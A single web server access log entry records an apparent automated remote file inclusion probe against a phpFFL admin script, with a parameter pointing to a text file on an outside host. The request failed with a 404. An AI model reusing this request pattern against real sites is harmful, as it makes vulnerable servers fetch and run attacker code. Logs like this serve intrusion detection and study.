202.47.247.136 - - [09/Jun/2008:10:09:11 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://h1.ripway.com/pantex/scan/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
